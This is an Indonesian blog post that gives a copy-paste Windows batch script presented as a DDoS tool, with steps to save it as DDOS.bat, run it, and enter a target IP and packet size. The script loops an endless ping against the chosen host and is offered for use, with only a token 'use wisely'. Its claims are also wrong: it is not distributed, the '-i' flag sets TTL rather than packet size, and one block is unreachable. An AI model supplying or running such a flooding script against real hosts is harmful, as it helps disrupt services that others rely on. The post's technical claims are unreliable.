Di sini saya cuma mau berbagi ilmu dengan kalian cara membuat
aplikasi DDOS(Distributed Denial of Service)dengan bantuan Notepad. Kalian bisa copy script yang saya buat di notepad.
Berikut ini script nya.
@echo off
mode 67,16
title DDOS Attacking Server
color 7c
cls
echo ==================================
echo = Hacking Tools =
echo ==================================
echo.
echo +++++++++++++++++++++++++++++++++++
echo + Name : DDOS Attacking Server +
echo + Author : ilham hafidz f +
echo + Visit : x-pos007.blogspot.com +
echo +++++++++++++++++++++++++++++++++++
echo.
goto Next
echo.
echo DDOS With Batchfile
echo.
set /p x=Server-Target:
echo.
ping %x%
@ping.exe 127.0.0.1 -n 5 -w 1000 > nul
goto Next
:Next
echo.
echo **********************************
echo * Masukan IP / Host Target *
echo **********************************
echo.
set /p m=ip Host:
echo.
set /p n=Packet Size:
echo.
:DDOS
color 7b
echo Attacking Server %m%
ping %m% -i %n% -t >nul
goto DDOS
Kemudian kalian save dengan exsitensi file nya .bat contoh (DDOS.bat). jika kalian ingin menggunakan ny klik 2x file tersebut kemudian masukan ip/host target dan masukkan paket size nya.
Jangan lupa gunakan lah dengan bijak ya :)
No comments:
Post a Comment